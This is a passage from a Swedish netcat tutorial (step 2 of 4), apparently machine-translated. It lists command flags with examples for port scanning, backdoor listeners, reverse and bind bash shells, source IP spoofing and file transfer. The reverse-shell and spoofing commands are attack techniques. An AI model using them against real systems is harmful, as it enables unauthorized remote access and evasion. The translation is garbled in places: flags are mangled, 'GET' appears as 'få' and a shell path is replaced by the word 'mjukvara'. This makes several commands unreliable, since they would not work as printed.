Roligare med netcat! (2 / 4 steg)
Steg 2: Grundläggande Netcat kommandon
-g gateway-källroutning hop (s), upp till 8
-G num källroutning pekaren: 4, 8, 12,...
-h denna cruft
-i SEK fördröjning intervall för linjer som skickas, portar skannas
-l lyssna-läge för inkommande ansluter
-L lyssna hårdare, åter lyssna på socket nära
-n endast numeriska IP-adresser, ingen DNS
-o fil hex dump trafik
-p lokal port portnummer
-r randomize lokala och fjärranslutna portar
-s addr lokala källadress
-t svar TELNET förhandling
-u UDP-läge
-v mångordig (Använd två gånger för att vara mer mångordig)
-w SEK timeout för ansluter och slutliga nätet läser
-Z noll-I/O -läge (används för att skanna)
portnummer kan vara enskilda eller varierar: m-n (inclusive)
Ansluta till en port på
en fjärrvärd
NC remote_host < port >
Ansluta till flera
hamnar på en fjärrvärd
NC remote_host < port >... < port >
Till exempel:
NC www.somecompanyasanexample.com 21 25 80
Lyssna på en port för
inkommande anslutningar
(Även känd som A bakdörren)
NC - v -l -p < port >
Ansluta till fjärr-värd
och servera en bash-skalet
NC remote_ip < port > -e/bin/bash
Observera att Netcat inte stöder flaggan -e som standard. Till
gör Netcat stödja flaggan -e, det måste vara re-kompilerat med
alternativet DGAPING_SECURITY_HOLE
Lyssna på en port och
servera en bash-skalet
på connect
NC - v -l -p < port > -e mjukvara
Observera att Netcat inte stöder flaggan -e som standard. Till
gör Netcat stödja flaggan -e, det måste vara re-kompilerat med
alternativet DGAPING_SECURITY_HOLE
Port scan en fjärrkontroll
värd
NC - v - z remote_host < port >-< port >
Användning -i flagga en försening intervall:
NC - jag < sekunder > - v - z remote_host
< port >-< port >
Pipe kommandoutdata
netcat begäran
< kommando > | NC remote_host < port >
Till exempel:
ECHO "få/HTTP/1.0
(ange)
(ange)
"| NC www.somecompanyasanexample.com 80
Använda källroutning till
ansluta till en port på en
fjärrvärden
NC - g < gateway > remote_host < port >
Obs: Upp till åtta hop poäng kan anges med -g-flaggan.
Använd flaggan - G ange källroutning pekaren.
Spolat källa IP
Adress
Använd flaggan - s att förfalska Källans IP-adress:
NC -s spoofed_ip remote_host port
Detta kommando kommer att orsaka fjärrvärden att svara tillbaka till den
falska IP-adress. -S-flaggan kan användas tillsammans med de flesta av
kommandona i den här tabellen.
Överföra en fil
På server-värden:
NC - v -l -p < port ><< filen >
På klient-värden:
NC - v < server_host >< port >>< filen >
Det är också möjligt för klienten värd att lyssna på en port för att
ta emot en fil. Gör detta genom att köra följande kommando på klienten
värd:
NC - v -l -p < port >> fil
Och kör du följande kommando på server-värden:
NC - v < client_host >< port >< fil
Dessa kan alla användas av din netcat